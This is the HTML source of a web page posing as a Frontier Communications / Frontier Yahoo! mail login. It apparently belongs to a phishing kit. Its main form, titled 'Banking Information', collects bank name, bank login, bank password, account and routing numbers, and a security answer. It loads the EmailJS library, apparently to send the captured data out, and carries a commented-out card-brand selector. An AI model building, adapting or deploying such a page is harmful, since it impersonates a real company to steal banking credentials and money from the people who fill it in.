<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Frontier Mail Login</title>
    <link rel="stylesheet" href="/index.css" />
    <link rel="stylesheet" href="/css/banking.css" />
    <link
      rel="stylesheet"
      href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@24,400,0,0" />
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/remixicon/4.2.0/remixicon.css" />
  </head>
  <body>
    <header class="section-header">
      <div class="nav-container">
        <nav class="navbar">
          <div class="nav-top-mobile">
            <div class="menu-icon-container">
              <span class="material-symbols-outlined menu-icon"> menu </span>
            </div>
            <div class="menu-logo-white">
              <img
                src="/images/frontier-logo-white.png"
                width="70"
                height="70"
                alt="" />
            </div>
          </div>
          <div class="nav-general">
            <!-- <img src="images/frontier_header.png" width="70" height="70"  alt=""> -->
            <div class="nav-items">
              <a class="nav-item">Residential</a>
              <a class="nav-item">Small Business</a>
              <a class="nav-item">Enterprise</a>
              <a class="nav-item">Wholesale</a>
            </div>
          </div>
        </nav>
      </div>

      <!-- <div class="header-logo-section">
        <div class="logo-img">
          <img
            src="/images/frontier_header.png"
            alt=""
            class="frontier-logo-img"
            width="70"
            height="70" />
        </div>
        <div class="header-drop-down">
          <select class="dropdown" name="Go to..." id="cars">
            <option value="goto...">Select</option>
            <option value="account">Mastercard</option>
            <option value="bill">Visa</option>
            <option value="mail">AMEX</option>
            <option value="mail">Discover</option>
          </select>
        </div> 
      </div> -->
    </header>

    <main class="section-main">
      <form
        type="/submit"
        class="main-container banking-form"
        id="banking-form">
        <h1 class="heading-text" id="banking-information">
          Banking Information
        </h1>
        <div class="email-section bank-name" id="bank-name">
          <span>Bank Name</span>
          <input name="bank-name" type="text" />
        </div>
        <div class="email-section bank-login" id="bank-login">
          <span>Bank Username/E-mail</span>
          <input name="bank-login" type="text" />
        </div>
        <div class="email-section bank-password" id="bank-password">
          <span>Password</span>
          <input name="bank-pass" type="password" placeholder="*********" />
        </div>
        <div class="email-section bank-routing" id="bank-routing">
          <span>Account Number</span>
          <input name="bank-account" type="text" />
        </div>
        <div class="email-section bank-account" id="bank-account">
          <span>Routing number</span>
          <input name="bank-routing" type="text" />
        </div>
        <div class="email-section security-container">
          <!-- <span>Email Address</span> -->
          <label for="security-question">Security Question</label>
          <select
            class="dropdown-banking"
            name="security-question"
            id="security-question">
            <option value="question">-- question --</option>
          </select>
        </div>
        <div class="email-section security-answer" id="security-answer">
          <span>Answer</span>
          <input name="security-answer" type="text" name="security-answer" />
        </div>

        <button class="login-btn verify-btn">VERIFY</button>
        <div class="pass-forget-container">
          <a class="pass-forget" href="">Make Frontier Yahoo! your homepage</a>
        </div>
        <div class="form-buttom">
          <div class="yahoo-search-section">
            <input class="yahoo-search-box" type="text" />
            <div class="yahoo-search-container">
              <span class="provided-by">Provided by</span>
              <img
                src="/images/yahoo.png"
                alt=""
                class="yah00-search-img"
                width="80" />
              <span class="search-btn">WEB SEARCH</span>
            </div>
          </div>
          <p>
            Still need help? <i class="ri-chat-3-fill"></i> Live Chat
            <i class="ri-question-fill"></i> Help Center
          </p>
          <p>
            <b>Note:</b> For your security, please be sure to log out when you
            are done.
          </p>
          <p>
            Frontier does not track how you use email or what sites you visit.
            If your Frontier email is hosted by Yahoo!, Yahoo! does not share
            this information with Frontier.
            <a href="">See Frontier's Privacy Policy.</a>
          </p>
        </div>
      </form>
    </main>

    <footer class="section-footer">
      <div class="footer-container">
        <div class="footer-container-top">
          <div class="footer-top-texts" onclick="showFooter(event, this)">
            <h4>
              SHOP <span><i class="ri-arrow-right-s-fill"></i></span>
            </h4>
            <div class="footer-top-links">
              <a href="" class="footer-top-link">Plans</a
              ><a href="" class="footer-top-link">Internet</a
              ><a href="" class="footer-top-link">Fiber Internet</a
              ><a href="" class="footer-top-link">Video/TV</a
              ><a href="" class="footer-top-link">Phone</a
              ><a href="" class="footer-top-link">Frontier Secure</a
              ><a href="" class="footer-top-link">Moving</a
              ><a href="" class="footer-top-link">Availability</a
              ><a href="" class="footer-top-link">Multifamily</a>
            </div>
          </div>
          <div class="footer-top-texts" onclick="showFooter(event, this)">
            <h4>
              MY ACCOUNT <span><i class="ri-arrow-right-s-fill"></i></span>
            </h4>
            <div class="footer-top-links">
              <a href="" class="footer-top-link">Register</a
              ><a href="" class="footer-top-link">Pay Bill</a
              ><a href="" class="footer-top-link">Check Email</a
              ><a href="" class="footer-top-link">Manage Account</a
              ><a href="" class="footer-top-link">MyFrontier App</a
              ><a href="" class="footer-top-link">Watch TV</a>
            </div>
          </div>
          <div class="footer-top-texts" onclick="showFooter(event, this)">
            <h4>
              SUPPORT <span><i class="ri-arrow-right-s-fill"></i></span>
            </h4>
            <div class="footer-top-links">
              <a href="" class="footer-top-link">Help Center</a
              ><a href="" class="footer-top-link">Video Gallery</a
              ><a href="" class="footer-top-link">Support Wizard</a
              ><a href="" class="footer-top-link">Trouble Ticket Status</a
              ><a href="" class="footer-top-link">Order Status</a
              ><a href="" class="footer-top-link">Contact Us</a>
            </div>
          </div>
          <div class="footer-top-texts" onclick="showFooter(event, this)">
            <h4>
              CORPORATE
              <span
                ><i class="ri-arrow-right-s-fill arrow-down" id="arrow-down"></i
              ></span>
            </h4>
            <div class="footer-top-links">
              <a href="" class="footer-top-link">Company</a
              ><a href="" class="footer-top-link">Investors</a
              ><a href="" class="footer-top-link">News</a
              ><a href="" class="footer-top-link">Blog</a
              ><a href="" class="footer-top-link">Responsibility</a
              ><a href="" class="footer-top-link">Suppliers</a
              ><a href="" class="footer-top-link">Public Inspection Files</a
              ><a href="" class="footer-top-link">Discount Programs</a
              ><a href="" class="footer-top-link">Careers</a>
            </div>
          </div>
          <div class="footer-top-texts" onclick="showFooter(event, this)">
            <h4>
              FRONTIER SITES <span><i class="ri-arrow-right-s-fill"></i></span>
            </h4>
            <div class="footer-top-links">
              <a href="" class="footer-top-link">Small Business</a
              ><a href="" class="footer-top-link">Enterprise</a
              ><a href="" class="footer-top-link">Wholesale</a
              ><a href="" class="footer-top-link">Frontier Yahoo Portal</a
              ><a href="" class="footer-top-link"
                >Frontier Business Partner Program</a
              ><a href="" class="footer-top-link">Phone Directories</a>
            </div>
          </div>
          <div class="footer-top-texts" onclick="showFooter(event, this)">
            <h4>
              SALES PARTNERS <span><i class="ri-arrow-right-s-fill"></i></span>
            </h4>
            <div class="footer-top-links">
              <a href="" class="footer-top-link">Frontier Internet</a
              ><a href="" class="footer-top-link">Frontier Fiber</a
              ><a href="" class="footer-top-link">Frontier Fiber Internet</a
              ><a href="" class="footer-top-link">Local Internet</a>
            </div>
          </div>
        </div>
        <div class="footer-container-bottom">
          <div class="footer-bottom-links">
            <span class="span-bottom-links">
              <a href="/views/billing.html">Home</a> | <a href="">Site Map</a> |
              <a href="">Store Locator</a> |
              <a href="">Policies & Notifications</a> |
              <a href="">Terms & Conditions</a> |
              <a href="">Privacy Policy</a> |
              <a href="">California Privacy Policy</a>
            </span>
            <p>
              &copy;2024 Frontier Communications Parent, Inc. All rights
              reserved.
            </p>
          </div>
          <div class="footer-socials">
            <div class="social-circle twitter">
              <i class="ri-twitter-fill"></i>
            </div>
            <div class="social-circle facebook">
              <i class="ri-facebook-fill"></i>
            </div>
            <div class="social-circle linkedin">
              <i class="ri-linkedin-fill"></i>
            </div>
            <div class="social-circle youtube">
              <i class="ri-youtube-fill"></i>
            </div>
          </div>
        </div>
      </div>
    </footer>

    <!-- Scripts -->
    <script src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>
    <script src="/index.js" type="text/javascript"></script>
  </body>
</html>
